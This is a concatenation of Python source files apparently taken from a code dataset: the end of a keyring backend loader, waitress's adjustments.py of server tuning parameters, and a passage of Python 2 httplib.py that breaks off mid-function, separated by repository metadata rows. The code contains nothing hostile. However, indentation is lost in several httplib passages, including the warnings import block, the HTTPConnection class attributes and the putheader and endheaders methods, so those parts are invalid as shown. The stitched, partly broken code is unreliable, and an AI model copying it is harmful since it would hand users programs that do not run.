        __import__('keyring.keyring.backends.'+mod_name, fromlist=('__name__',))

    def is_class_viable(keyring_cls):
        # A backend advertises unsuitability by raising RuntimeError from
        # its priority attribute; anything else counts as viable here.
        try:
            keyring_cls.priority
        except RuntimeError:
            return False
        return True

    # _classes is populated by KeyringBackendMeta for every concrete backend.
    all_classes = KeyringBackend._classes
    # NOTE: itertools.ifilter is Python 2 only.
    viable_classes = itertools.ifilter(is_class_viable, all_classes)
    return list(util.suppress_exceptions(viable_classes,
        exceptions=TypeError))
| bsd-3-clause |
SamuelDSR/YouCompleteMe-Win7-GVIM | third_party/waitress/waitress/adjustments.py | 3 | 7142 | ##############################################################################
#
# Copyright (c) 2002 Zope Foundation and Contributors.
# All Rights Reserved.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE.
#
##############################################################################
"""Adjustments are tunable parameters.
"""
import getopt
import socket
import sys
# The set of (lower-cased, stripped) strings accepted as "true".
truthy = frozenset(('t', 'true', 'y', 'yes', 'on', '1'))

def asbool(s):
    """Coerce *s* to a boolean.

    ``None`` maps to ``False``; actual booleans are returned untouched;
    everything else is stringified, stripped, lower-cased and tested for
    membership in ``truthy``.
    """
    if s is None:
        return False
    if isinstance(s, bool):
        return s
    return str(s).strip().lower() in truthy
def asoctal(s):
    """Parse *s* as a base-8 integer (e.g. ``'600'`` -> ``384``)."""
    return int(s, base=8)
def slash_suffix_stripped_str(s):
    """Return *s* with every trailing ``'/'`` character removed."""
    while s.endswith('/'):
        s = s[:-1]
    return s
class Adjustments(object):
    """This class contains tunable parameters.

    Each adjustment is a class attribute holding its default; the
    ``_params`` table maps adjustment names to the conversion function
    used to coerce string values (from kwargs or the command line).
    """

    # (name, coercion-function) pairs for every supported adjustment.
    _params = (
        ('host', str),
        ('port', int),
        ('threads', int),
        ('url_scheme', str),
        ('url_prefix', slash_suffix_stripped_str),
        ('backlog', int),
        ('recv_bytes', int),
        ('send_bytes', int),
        ('outbuf_overflow', int),
        ('inbuf_overflow', int),
        ('connection_limit', int),
        ('cleanup_interval', int),
        ('channel_timeout', int),
        ('log_socket_errors', asbool),
        ('max_request_header_size', int),
        ('max_request_body_size', int),
        ('expose_tracebacks', asbool),
        ('ident', str),
        ('asyncore_loop_timeout', int),
        ('asyncore_use_poll', asbool),
        ('unix_socket', str),
        ('unix_socket_perms', asoctal),
        )

    _param_map = dict(_params)

    # hostname or IP address to listen on
    host = '0.0.0.0'

    # TCP port to listen on
    port = 8080

    # number of threads available for tasks
    threads = 4

    # default ``wsgi.url_scheme`` value
    url_scheme = 'http'

    # default ``SCRIPT_NAME`` value, also helps reset ``PATH_INFO``
    # when nonempty
    url_prefix = ''

    # server identity (sent in Server: header)
    ident = 'waitress'

    # backlog is the value waitress passes to socket.listen() This is
    # the maximum number of incoming TCP connections that will wait in an OS
    # queue for an available channel.  From listen(1): "If a connection
    # request arrives when the queue is full, the client may receive an error
    # with an indication of ECONNREFUSED or, if the underlying protocol
    # supports retransmission, the request may be ignored so that a later
    # reattempt at connection succeeds."
    backlog = 1024

    # recv_bytes is the argument to pass to socket.recv().
    recv_bytes = 8192

    # send_bytes is the number of bytes to send to socket.send().  Multiples
    # of 9000 should avoid partly-filled packets, but don't set this larger
    # than the TCP write buffer size.  In Linux, /proc/sys/net/ipv4/tcp_wmem
    # controls the minimum, default, and maximum sizes of TCP write buffers.
    send_bytes = 18000

    # A tempfile should be created if the pending output is larger than
    # outbuf_overflow, which is measured in bytes. The default is 1MB.  This
    # is conservative.
    outbuf_overflow = 1048576

    # A tempfile should be created if the pending input is larger than
    # inbuf_overflow, which is measured in bytes. The default is 512K.  This
    # is conservative.
    inbuf_overflow = 524288

    # Stop creating new channels if too many are already active (integer).
    # Each channel consumes at least one file descriptor, and, depending on
    # the input and output body sizes, potentially up to three.  The default
    # is conservative, but you may need to increase the number of file
    # descriptors available to the Waitress process on most platforms in
    # order to safely change it (see ``ulimit -a`` "open files" setting).
    # Note that this doesn't control the maximum number of TCP connections
    # that can be waiting for processing; the ``backlog`` argument controls
    # that.
    connection_limit = 100

    # Minimum seconds between cleaning up inactive channels.
    cleanup_interval = 30

    # Maximum seconds to leave an inactive connection open.
    channel_timeout = 120

    # Boolean: turn off to not log premature client disconnects.
    log_socket_errors = True

    # maximum number of bytes of all request headers combined (256K default)
    max_request_header_size = 262144

    # maximum number of bytes in request body (1GB default)
    max_request_body_size = 1073741824

    # expose tracebacks of uncaught exceptions
    expose_tracebacks = False

    # Path to a Unix domain socket to use.
    unix_socket = None

    # Octal permission bits to set on the Unix domain socket.
    unix_socket_perms = 0o600

    # The socket options to set on receiving a connection.  It is a list of
    # (level, optname, value) tuples.  TCP_NODELAY disables the Nagle
    # algorithm for writes (Waitress already buffers its writes).
    socket_options = [
        (socket.SOL_TCP, socket.TCP_NODELAY, 1),
        ]

    # The asyncore.loop timeout value
    asyncore_loop_timeout = 1

    # The asyncore.loop flag to use poll() instead of the default select().
    asyncore_use_poll = False

    def __init__(self, **kw):
        # Coerce and apply each keyword adjustment; unknown names are a
        # hard error so typos don't silently fall through to defaults.
        for k, v in kw.items():
            if k not in self._param_map:
                raise ValueError('Unknown adjustment %r' % k)
            setattr(self, k, self._param_map[k](v))

        # On Windows, binding to 'localhost' is replaced by the wildcard.
        if (sys.platform[:3] == "win" and
                self.host == 'localhost'): # pragma: no cover
            self.host = ''

    @classmethod
    def parse_args(cls, argv):
        """Parse command line arguments.

        Returns ``(kw, args)`` where ``kw`` maps adjustment names to
        coerced values (plus the ``help``/``call`` flags) and ``args``
        is the list of remaining positional arguments.
        """
        long_opts = ['help', 'call']
        for opt, cast in cls._params:
            opt = opt.replace('_', '-')
            if cast is asbool:
                # Boolean adjustments get both --opt and --no-opt forms.
                long_opts.append(opt)
                long_opts.append('no-' + opt)
            else:
                long_opts.append(opt + '=')

        kw = {
            'help': False,
            'call': False,
            }
        opts, args = getopt.getopt(argv, '', long_opts)
        for opt, value in opts:
            param = opt.lstrip('-').replace('-', '_')
            if param.startswith('no_'):
                # --no-<opt> negates a boolean adjustment.
                param = param[3:]
                kw[param] = False
            elif param in ('help', 'call') or cls._param_map[param] is asbool:
                kw[param] = True
            else:
                kw[param] = cls._param_map[param](value)
        return kw, args
| gpl-3.0 |
eBay/restcommander | play-1.2.4/python/Lib/httplib.py | 7 | 43590 | """HTTP/1.1 client library
<intro stuff goes here>
<other stuff, too>
HTTPConnection goes through a number of "states", which define when a client
may legally make another request or fetch the response for a particular
request. This diagram details these state transitions:
(null)
|
| HTTPConnection()
v
Idle
|
| putrequest()
v
Request-started
|
| ( putheader() )* endheaders()
v
Request-sent
|
| response = getresponse()
v
Unread-response [Response-headers-read]
|\____________________
| |
| response.read() | putrequest()
v v
Idle Req-started-unread-response
______/|
/ |
response.read() | | ( putheader() )* endheaders()
v v
Request-started Req-sent-unread-response
|
| response.read()
v
Request-sent
This diagram presents the following rules:
-- a second request may not be started until {response-headers-read}
-- a response [object] cannot be retrieved until {request-sent}
-- there is no differentiation between an unread response body and a
partially read response body
Note: this enforcement is applied by the HTTPConnection class. The
HTTPResponse class does not enforce this state machine, which
implies sophisticated clients may accelerate the request/response
pipeline. Caution should be taken, though: accelerating the states
beyond the above pattern may imply knowledge of the server's
connection-close behavior for certain requests. For example, it
is impossible to tell whether the server will close the connection
UNTIL the response headers have been read; this means that further
requests cannot be placed into the pipeline until it is known that
the server will NOT be closing the connection.
Logical State __state __response
------------- ------- ----------
Idle _CS_IDLE None
Request-started _CS_REQ_STARTED None
Request-sent _CS_REQ_SENT None
Unread-response _CS_IDLE <response_class>
Req-started-unread-response _CS_REQ_STARTED <response_class>
Req-sent-unread-response _CS_REQ_SENT <response_class>
"""
import socket
from sys import py3kwarning
from urlparse import urlsplit
import warnings
with warnings.catch_warnings():
if py3kwarning:
warnings.filterwarnings("ignore", ".*mimetools has been removed",
DeprecationWarning)
import mimetools
try:
from cStringIO import StringIO
except ImportError:
from StringIO import StringIO
__all__ = ["HTTP", "HTTPResponse", "HTTPConnection",
"HTTPException", "NotConnected", "UnknownProtocol",
"UnknownTransferEncoding", "UnimplementedFileMode",
"IncompleteRead", "InvalidURL", "ImproperConnectionState",
"CannotSendRequest", "CannotSendHeader", "ResponseNotReady",
"BadStatusLine", "error", "responses"]
# Default ports for the two schemes.
HTTP_PORT = 80
HTTPS_PORT = 443

# Sentinel for response attributes not yet parsed from the wire.
_UNKNOWN = 'UNKNOWN'

# connection states
_CS_IDLE = 'Idle'
_CS_REQ_STARTED = 'Request-started'
_CS_REQ_SENT = 'Request-sent'

# status codes
# informational
CONTINUE = 100
SWITCHING_PROTOCOLS = 101
PROCESSING = 102

# successful
OK = 200
CREATED = 201
ACCEPTED = 202
NON_AUTHORITATIVE_INFORMATION = 203
NO_CONTENT = 204
RESET_CONTENT = 205
PARTIAL_CONTENT = 206
MULTI_STATUS = 207
IM_USED = 226

# redirection
MULTIPLE_CHOICES = 300
MOVED_PERMANENTLY = 301
FOUND = 302
SEE_OTHER = 303
NOT_MODIFIED = 304
USE_PROXY = 305
TEMPORARY_REDIRECT = 307

# client error
BAD_REQUEST = 400
UNAUTHORIZED = 401
PAYMENT_REQUIRED = 402
FORBIDDEN = 403
NOT_FOUND = 404
METHOD_NOT_ALLOWED = 405
NOT_ACCEPTABLE = 406
PROXY_AUTHENTICATION_REQUIRED = 407
REQUEST_TIMEOUT = 408
CONFLICT = 409
GONE = 410
LENGTH_REQUIRED = 411
PRECONDITION_FAILED = 412
REQUEST_ENTITY_TOO_LARGE = 413
REQUEST_URI_TOO_LONG = 414
UNSUPPORTED_MEDIA_TYPE = 415
REQUESTED_RANGE_NOT_SATISFIABLE = 416
EXPECTATION_FAILED = 417
UNPROCESSABLE_ENTITY = 422
LOCKED = 423
FAILED_DEPENDENCY = 424
UPGRADE_REQUIRED = 426

# server error
INTERNAL_SERVER_ERROR = 500
NOT_IMPLEMENTED = 501
BAD_GATEWAY = 502
SERVICE_UNAVAILABLE = 503
GATEWAY_TIMEOUT = 504
HTTP_VERSION_NOT_SUPPORTED = 505
INSUFFICIENT_STORAGE = 507
NOT_EXTENDED = 510

# Mapping status codes to official W3C names
responses = {
    100: 'Continue',
    101: 'Switching Protocols',

    200: 'OK',
    201: 'Created',
    202: 'Accepted',
    203: 'Non-Authoritative Information',
    204: 'No Content',
    205: 'Reset Content',
    206: 'Partial Content',

    300: 'Multiple Choices',
    301: 'Moved Permanently',
    302: 'Found',
    303: 'See Other',
    304: 'Not Modified',
    305: 'Use Proxy',
    306: '(Unused)',
    307: 'Temporary Redirect',

    400: 'Bad Request',
    401: 'Unauthorized',
    402: 'Payment Required',
    403: 'Forbidden',
    404: 'Not Found',
    405: 'Method Not Allowed',
    406: 'Not Acceptable',
    407: 'Proxy Authentication Required',
    408: 'Request Timeout',
    409: 'Conflict',
    410: 'Gone',
    411: 'Length Required',
    412: 'Precondition Failed',
    413: 'Request Entity Too Large',
    414: 'Request-URI Too Long',
    415: 'Unsupported Media Type',
    416: 'Requested Range Not Satisfiable',
    417: 'Expectation Failed',

    500: 'Internal Server Error',
    501: 'Not Implemented',
    502: 'Bad Gateway',
    503: 'Service Unavailable',
    504: 'Gateway Timeout',
    505: 'HTTP Version Not Supported',
}

# maximal amount of data to read at one time in _safe_read
MAXAMOUNT = 1048576
class HTTPMessage(mimetools.Message):
    """RFC 822-style message parser specialized for HTTP headers.

    Differs from the mimetools/rfc822 base in how repeated and continued
    header fields are folded into ``self.dict``.
    """

    def addheader(self, key, value):
        """Add header for field key handling repeats."""
        prev = self.dict.get(key)
        if prev is None:
            self.dict[key] = value
        else:
            # RFC 2616 sec 4.2: repeated fields are joined with ", ".
            combined = ", ".join((prev, value))
            self.dict[key] = combined

    def addcontinue(self, key, more):
        """Add more field data from a continuation line."""
        prev = self.dict[key]
        self.dict[key] = prev + "\n " + more

    def readheaders(self):
        """Read header lines.

        Read header lines up to the entirely blank line that terminates them.
        The (normally blank) line that ends the headers is skipped, but not
        included in the returned list.  If a non-header line ends the headers,
        (which is an error), an attempt is made to backspace over it; it is
        never included in the returned list.

        The variable self.status is set to the empty string if all went well,
        otherwise it is an error message.  The variable self.headers is a
        completely uninterpreted list of lines contained in the header (so
        printing them will reproduce the header exactly as it appears in the
        file).

        If multiple header fields with the same name occur, they are combined
        according to the rules in RFC 2616 sec 4.2:

        Appending each subsequent field-value to the first, each separated
        by a comma. The order in which header fields with the same field-name
        are received is significant to the interpretation of the combined
        field value.
        """
        # XXX The implementation overrides the readheaders() method of
        # rfc822.Message.  The base class design isn't amenable to
        # customized behavior here so the method here is a copy of the
        # base class code with a few small changes.

        self.dict = {}
        self.unixfrom = ''
        self.headers = hlist = []
        self.status = ''
        headerseen = ""
        firstline = 1
        # Prefer the file object's unread() for pushback; fall back to
        # remembering the line's start offset via tell()/seek().
        startofline = unread = tell = None
        if hasattr(self.fp, 'unread'):
            unread = self.fp.unread
        elif self.seekable:
            tell = self.fp.tell
        while True:
            if tell:
                try:
                    startofline = tell()
                except IOError:
                    startofline = tell = None
                    self.seekable = 0
            line = self.fp.readline()
            if not line:
                self.status = 'EOF in headers'
                break
            # Skip unix From name time lines
            if firstline and line.startswith('From '):
                self.unixfrom = self.unixfrom + line
                continue
            firstline = 0
            if headerseen and line[0] in ' \t':
                # XXX Not sure if continuation lines are handled properly
                # for http and/or for repeating headers
                # It's a continuation line.
                hlist.append(line)
                self.addcontinue(headerseen, line.strip())
                continue
            elif self.iscomment(line):
                # It's a comment.  Ignore it.
                continue
            elif self.islast(line):
                # Note! No pushback here!  The delimiter line gets eaten.
                break
            headerseen = self.isheader(line)
            if headerseen:
                # It's a legal header line, save it.
                hlist.append(line)
                self.addheader(headerseen, line[len(headerseen)+1:].strip())
                continue
            else:
                # It's not a header line; throw it back and stop here.
                if not self.dict:
                    self.status = 'No headers'
                else:
                    self.status = 'Non-header line where header expected'
                # Try to undo the read.
                if unread:
                    unread(line)
                elif tell:
                    self.fp.seek(startofline)
                else:
                    self.status = self.status + '; bad seek'
                break
class HTTPResponse:
    """Parses and exposes one HTTP response read from a socket."""

    # strict: If true, raise BadStatusLine if the status line can't be
    # parsed as a valid HTTP/1.0 or 1.1 status line.  By default it is
    # false because it prevents clients from talking to HTTP/0.9
    # servers.  Note that a response with a sufficiently corrupted
    # status line will look like an HTTP/0.9 response.
    # See RFC 2616 sec 19.6 and RFC 1945 sec 6 for details.

    def __init__(self, sock, debuglevel=0, strict=0, method=None):
        # Unbuffered file wrapper around the socket; all parsing reads
        # go through self.fp.
        self.fp = sock.makefile('rb', 0)
        self.debuglevel = debuglevel
        self.strict = strict
        # The request method matters for framing (HEAD has no body).
        self._method = method

        self.msg = None

        # from the Status-Line of the response
        self.version = _UNKNOWN # HTTP-Version
        self.status = _UNKNOWN  # Status-Code
        self.reason = _UNKNOWN  # Reason-Phrase

        self.chunked = _UNKNOWN         # is "chunked" being used?
        self.chunk_left = _UNKNOWN      # bytes left to read in current chunk
        self.length = _UNKNOWN          # number of bytes left in response
        self.will_close = _UNKNOWN      # conn will close at end of response

    def _read_status(self):
        """Read and parse the status line; returns (version, status, reason).

        May raise BadStatusLine, or fall back to HTTP/0.9 handling when
        non-strict and the line does not start with 'HTTP/'.
        """
        # Initialize with Simple-Response defaults
        line = self.fp.readline()
        if self.debuglevel > 0:
            print "reply:", repr(line)
        if not line:
            # Presumably, the server closed the connection before
            # sending a valid response.
            raise BadStatusLine(line)
        try:
            [version, status, reason] = line.split(None, 2)
        except ValueError:
            try:
                [version, status] = line.split(None, 1)
                reason = ""
            except ValueError:
                # empty version will cause next test to fail and status
                # will be treated as 0.9 response.
                version = ""
        if not version.startswith('HTTP/'):
            if self.strict:
                self.close()
                raise BadStatusLine(line)
            else:
                # assume it's a Simple-Response from an 0.9 server
                self.fp = LineAndFileWrapper(line, self.fp)
                return "HTTP/0.9", 200, ""

        # The status code is a three-digit number
        try:
            status = int(status)
            if status < 100 or status > 999:
                raise BadStatusLine(line)
        except ValueError:
            raise BadStatusLine(line)
        return version, status, reason

    def begin(self):
        """Read the status line and headers, and set up body framing
        (chunked flag, content length, will_close)."""
        if self.msg is not None:
            # we've already started reading the response
            return

        # read until we get a non-100 response
        while True:
            version, status, reason = self._read_status()
            if status != CONTINUE:
                break
            # skip the header from the 100 response
            while True:
                skip = self.fp.readline().strip()
                if not skip:
                    break
                if self.debuglevel > 0:
                    print "header:", skip

        self.status = status
        self.reason = reason.strip()
        if version == 'HTTP/1.0':
            self.version = 10
        elif version.startswith('HTTP/1.'):
            self.version = 11   # use HTTP/1.1 code for HTTP/1.x where x>=1
        elif version == 'HTTP/0.9':
            self.version = 9
        else:
            raise UnknownProtocol(version)

        if self.version == 9:
            # HTTP/0.9 has no headers: the whole stream is the body and
            # the connection closes at its end.
            self.length = None
            self.chunked = 0
            self.will_close = 1
            self.msg = HTTPMessage(StringIO())
            return

        self.msg = HTTPMessage(self.fp, 0)
        if self.debuglevel > 0:
            for hdr in self.msg.headers:
                print "header:", hdr,

        # don't let the msg keep an fp
        self.msg.fp = None

        # are we using the chunked-style of transfer encoding?
        tr_enc = self.msg.getheader('transfer-encoding')
        if tr_enc and tr_enc.lower() == "chunked":
            self.chunked = 1
            self.chunk_left = None
        else:
            self.chunked = 0

        # will the connection close at the end of the response?
        self.will_close = self._check_close()

        # do we have a Content-Length?
        # NOTE: RFC 2616, S4.4, #3 says we ignore this if tr_enc is "chunked"
        length = self.msg.getheader('content-length')
        if length and not self.chunked:
            try:
                self.length = int(length)
            except ValueError:
                self.length = None
            else:
                if self.length < 0:  # ignore nonsensical negative lengths
                    self.length = None
        else:
            self.length = None

        # does the body have a fixed length? (of zero)
        if (status == NO_CONTENT or status == NOT_MODIFIED or
            100 <= status < 200 or      # 1xx codes
            self._method == 'HEAD'):
            self.length = 0

        # if the connection remains open, and we aren't using chunked, and
        # a content-length was not provided, then assume that the connection
        # WILL close.
        if not self.will_close and \
           not self.chunked and \
           self.length is None:
            self.will_close = 1

    def _check_close(self):
        conn = self.msg.getheader('connection')
        if self.version == 11:
            # An HTTP/1.1 proxy is assumed to stay open unless
            # explicitly closed.
            # (The second getheader() lookup below is redundant with the
            # one above, but harmless.)
            conn = self.msg.getheader('connection')
            if conn and "close" in conn.lower():
                return True
            return False

        # Some HTTP/1.0 implementations have support for persistent
        # connections, using rules different than HTTP/1.1.

        # For older HTTP, Keep-Alive indicates persistent connection.
        if self.msg.getheader('keep-alive'):
            return False

        # At least Akamai returns a "Connection: Keep-Alive" header,
        # which was supposed to be sent by the client.
        if conn and "keep-alive" in conn.lower():
            return False

        # Proxy-Connection is a netscape hack.
        pconn = self.msg.getheader('proxy-connection')
        if pconn and "keep-alive" in pconn.lower():
            return False

        # otherwise, assume it will close
        return True

    def close(self):
        if self.fp:
            self.fp.close()
            self.fp = None

    def isclosed(self):
        # NOTE: it is possible that we will not ever call self.close(). This
        #       case occurs when will_close is TRUE, length is None, and we
        #       read up to the last byte, but NOT past it.
        #
        # IMPLIES: if will_close is FALSE, then self.close() will ALWAYS be
        #          called, meaning self.isclosed() is meaningful.
        return self.fp is None

    # XXX It would be nice to have readline and __iter__ for this, too.

    def read(self, amt=None):
        """Read up to *amt* bytes of the body (all of it when amt is None)."""
        if self.fp is None:
            return ''

        if self.chunked:
            return self._read_chunked(amt)

        if amt is None:
            # unbounded read
            if self.length is None:
                s = self.fp.read()
            else:
                s = self._safe_read(self.length)
                self.length = 0
            self.close()        # we read everything
            return s

        if self.length is not None:
            if amt > self.length:
                # clip the read to the "end of response"
                amt = self.length

        # we do not use _safe_read() here because this may be a .will_close
        # connection, and the user is reading more bytes than will be provided
        # (for example, reading in 1k chunks)
        s = self.fp.read(amt)
        if self.length is not None:
            self.length -= len(s)
            if not self.length:
                self.close()
        return s

    def _read_chunked(self, amt):
        """Read from a chunked-encoded body; amt=None means read it all."""
        assert self.chunked != _UNKNOWN
        chunk_left = self.chunk_left
        value = ''

        # XXX This accumulates chunks by repeated string concatenation,
        # which is not efficient as the number or size of chunks gets big.
        while True:
            if chunk_left is None:
                # Start of a new chunk: parse the hex size line.
                line = self.fp.readline()
                i = line.find(';')
                if i >= 0:
                    line = line[:i] # strip chunk-extensions
                try:
                    chunk_left = int(line, 16)
                except ValueError:
                    # close the connection as protocol synchronisation is
                    # probably lost
                    self.close()
                    raise IncompleteRead(value)
                if chunk_left == 0:
                    # zero-size chunk terminates the body
                    break
            if amt is None:
                value += self._safe_read(chunk_left)
            elif amt < chunk_left:
                value += self._safe_read(amt)
                self.chunk_left = chunk_left - amt
                return value
            elif amt == chunk_left:
                value += self._safe_read(amt)
                self._safe_read(2)  # toss the CRLF at the end of the chunk
                self.chunk_left = None
                return value
            else:
                value += self._safe_read(chunk_left)
                amt -= chunk_left

            # we read the whole chunk, get another
            self._safe_read(2)      # toss the CRLF at the end of the chunk
            chunk_left = None

        # read and discard trailer up to the CRLF terminator
        ### note: we shouldn't have any trailers!
        while True:
            line = self.fp.readline()
            if not line:
                # a vanishingly small number of sites EOF without
                # sending the trailer
                break
            if line == '\r\n':
                break

        # we read everything; close the "file"
        self.close()

        return value

    def _safe_read(self, amt):
        """Read the number of bytes requested, compensating for partial reads.

        Normally, we have a blocking socket, but a read() can be interrupted
        by a signal (resulting in a partial read).

        Note that we cannot distinguish between EOF and an interrupt when zero
        bytes have been read. IncompleteRead() will be raised in this
        situation.

        This function should be used when <amt> bytes "should" be present for
        reading. If the bytes are truly not available (due to EOF), then the
        IncompleteRead exception can be used to detect the problem.
        """
        s = []
        while amt > 0:
            chunk = self.fp.read(min(amt, MAXAMOUNT))
            if not chunk:
                raise IncompleteRead(s)
            s.append(chunk)
            amt -= len(chunk)
        return ''.join(s)

    def getheader(self, name, default=None):
        if self.msg is None:
            raise ResponseNotReady()
        return self.msg.getheader(name, default)

    def getheaders(self):
        """Return list of (header, value) tuples."""
        if self.msg is None:
            raise ResponseNotReady()
        return self.msg.items()
class HTTPConnection:
_http_vsn = 11
_http_vsn_str = 'HTTP/1.1'
response_class = HTTPResponse
default_port = HTTP_PORT
auto_open = 1
debuglevel = 0
strict = 0
    def __init__(self, host, port=None, strict=None,
                 timeout=socket._GLOBAL_DEFAULT_TIMEOUT):
        # strict is tri-state: None leaves the class-level default intact.
        self.timeout = timeout
        self.sock = None
        self._buffer = []           # pending request lines, flushed by _send_output()
        self.__response = None      # most recent HTTPResponse, if unread
        self.__state = _CS_IDLE    # request/response state machine (see module docstring)
        self._method = None

        self._set_hostport(host, port)
        if strict is not None:
            self.strict = strict
    def _set_hostport(self, host, port):
        """Store host and port, splitting a 'host:port' string and
        unwrapping bracketed IPv6 literals; defaults the port if absent."""
        if port is None:
            i = host.rfind(':')
            j = host.rfind(']')         # ipv6 addresses have [...]
            if i > j:
                try:
                    port = int(host[i+1:])
                except ValueError:
                    raise InvalidURL("nonnumeric port: '%s'" % host[i+1:])
                host = host[:i]
            else:
                port = self.default_port
        if host and host[0] == '[' and host[-1] == ']':
            host = host[1:-1]
        self.host = host
        self.port = port
    def set_debuglevel(self, level):
        """Set the debug output level (0 silences debug printing)."""
        self.debuglevel = level
    def connect(self):
        """Connect to the host and port specified in __init__."""
        self.sock = socket.create_connection((self.host,self.port),
                                             self.timeout)
    def close(self):
        """Close the connection to the HTTP server."""
        if self.sock:
            self.sock.close()   # close it manually... there may be other refs
            self.sock = None
        if self.__response:
            self.__response.close()
            self.__response = None
        # Reset the state machine so a new request may be started.
        self.__state = _CS_IDLE
    def send(self, str):
        """Send `str' to the server.

        `str' may also be a file-like object with a read() method, in
        which case it is streamed in 8K blocks.
        """
        if self.sock is None:
            if self.auto_open:
                self.connect()
            else:
                raise NotConnected()

        # send the data to the server. if we get a broken pipe, then close
        # the socket. we want to reconnect when somebody tries to send again.
        #
        # NOTE: we DO propagate the error, though, because we cannot simply
        #       ignore the error... the caller will know if they can retry.
        if self.debuglevel > 0:
            print "send:", repr(str)
        try:
            blocksize=8192
            if hasattr(str,'read') :
                if self.debuglevel > 0: print "sendIng a read()able"
                data=str.read(blocksize)
                while data:
                    self.sock.sendall(data)
                    data=str.read(blocksize)
            else:
                self.sock.sendall(str)
        except socket.error, v:
            if v[0] == 32:      # Broken pipe
                self.close()
            raise
    def _output(self, s):
        """Add a line of output to the current request buffer.

        Assumes that the line does *not* end with \\r\\n.
        """
        self._buffer.append(s)
    def _send_output(self):
        """Send the currently buffered request and clear the buffer.

        Appends an extra \\r\\n to the buffer.
        """
        # Two empty strings yield the blank line that terminates the headers.
        self._buffer.extend(("", ""))
        msg = "\r\n".join(self._buffer)
        del self._buffer[:]
        self.send(msg)
    def putrequest(self, method, url, skip_host=0, skip_accept_encoding=0):
        """Send a request to the server.

        `method' specifies an HTTP request method, e.g. 'GET'.
        `url' specifies the object being requested, e.g. '/index.html'.
        `skip_host' if True does not add automatically a 'Host:' header
        `skip_accept_encoding' if True does not add automatically an
           'Accept-Encoding:' header

        Raises CannotSendRequest unless the connection is Idle.
        """

        # if a prior response has been completed, then forget about it.
        if self.__response and self.__response.isclosed():
            self.__response = None

        # in certain cases, we cannot issue another request on this connection.
        # this occurs when:
        #   1) we are in the process of sending a request.   (_CS_REQ_STARTED)
        #   2) a response to a previous request has signalled that it is going
        #      to close the connection upon completion.
        #   3) the headers for the previous response have not been read, thus
        #      we cannot determine whether point (2) is true.   (_CS_REQ_SENT)
        #
        # if there is no prior response, then we can request at will.
        #
        # if point (2) is true, then we will have passed the socket to the
        # response (effectively meaning, "there is no prior response"), and
        # will open a new one when a new request is made.
        #
        # Note: if a prior response exists, then we *can* start a new request.
        #       We are not allowed to begin fetching the response to this new
        #       request, however, until that prior response is complete.
        #
        if self.__state == _CS_IDLE:
            self.__state = _CS_REQ_STARTED
        else:
            raise CannotSendRequest()

        # Save the method we use, we need it later in the response phase
        self._method = method
        if not url:
            url = '/'
        str = '%s %s %s' % (method, url, self._http_vsn_str)

        self._output(str)

        if self._http_vsn == 11:
            # Issue some standard headers for better HTTP/1.1 compliance

            if not skip_host:
                # this header is issued *only* for HTTP/1.1
                # connections. more specifically, this means it is
                # only issued when the client uses the new
                # HTTPConnection() class. backwards-compat clients
                # will be using HTTP/1.0 and those clients may be
                # issuing this header themselves. we should NOT issue
                # it twice; some web servers (such as Apache) barf
                # when they see two Host: headers

                # If we need a non-standard port,include it in the
                # header.  If the request is going through a proxy,
                # but the host of the actual URL, not the host of the
                # proxy.

                netloc = ''
                if url.startswith('http'):
                    nil, netloc, nil, nil, nil = urlsplit(url)

                if netloc:
                    try:
                        netloc_enc = netloc.encode("ascii")
                    except UnicodeEncodeError:
                        netloc_enc = netloc.encode("idna")
                    self.putheader('Host', netloc_enc)
                else:
                    try:
                        host_enc = self.host.encode("ascii")
                    except UnicodeEncodeError:
                        host_enc = self.host.encode("idna")
                    if self.port == self.default_port:
                        self.putheader('Host', host_enc)
                    else:
                        self.putheader('Host', "%s:%s" % (host_enc, self.port))

            # note: we are assuming that clients will not attempt to set these
            #       headers since *this* library must deal with the
            #       consequences. this also means that when the supporting
            #       libraries are updated to recognize other forms, then this
            #       code should be changed (removed or updated).

            # we only want a Content-Encoding of "identity" since we don't
            # support encodings such as x-gzip or x-deflate.
            if not skip_accept_encoding:
                self.putheader('Accept-Encoding', 'identity')

            # we can accept "chunked" Transfer-Encodings, but no others
            # NOTE: no TE header implies *only* "chunked"
            #self.putheader('TE', 'chunked')

            # if TE is supplied in the header, then it must appear in a
            # Connection header.
            #self.putheader('Connection', 'TE')

        else:
            # For HTTP/1.0, the server will assume "not chunked"
            pass
def putheader(self, header, value):
"""Send a request header line to the server.
For example: h.putheader('Accept', 'text/html')
"""
if self.__state != _CS_REQ_STARTED:
raise CannotSendHeader()
str = '%s: %s' % (header, value)
self._output(str)
def endheaders(self):
"""Indicate that the last header line has been sent to the server."""
if self.__state == _CS_REQ_STARTED:
self.__state = _CS_REQ_SENT
else:
raise CannotSendHeader()
self._send_output()
    def request(self, method, url, body=None, headers={}):
        """Send a complete request to the server.

        Convenience wrapper around _send_request().  If the server dropped
        a persistent connection ('Broken pipe') and auto_open is enabled,
        the request is retried once on a fresh connection.

        NOTE: the shared {} default for 'headers' is safe here because
        headers is only read, never mutated (see _send_request).
        """
        try:
            self._send_request(method, url, body, headers)
        except socket.error, v:
            # trap 'Broken pipe' if we're allowed to automatically reconnect
            # (errno 32 == EPIPE; any other socket error is propagated)
            if v[0] != 32 or not self.auto_open:
                raise
            # try one more time
            self._send_request(method, url, body, headers)
    def _send_request(self, method, url, body, headers):
        """Emit request line, headers and optional body in one shot.

        Caller-supplied Host: / Accept-Encoding: headers suppress the
        automatic ones; Content-Length is derived from the body when the
        caller did not provide one.
        """
        # honour explicitly requested Host: and Accept-Encoding headers
        # (matched case-insensitively; putrequest would otherwise add its own)
        header_names = dict.fromkeys([k.lower() for k in headers])
        skips = {}
        if 'host' in header_names:
            skips['skip_host'] = 1
        if 'accept-encoding' in header_names:
            skips['skip_accept_encoding'] = 1
        self.putrequest(method, url, **skips)
        # Derive Content-Length: len() for strings/sequences, else fstat()
        # for file-like objects; give up silently if neither works.
        if body and ('content-length' not in header_names):
            thelen=None
            try:
                thelen=str(len(body))
            except TypeError, te:
                # If this is a file-like object, try to
                # fstat its file descriptor
                import os
                try:
                    thelen = str(os.fstat(body.fileno()).st_size)
                except (AttributeError, OSError):
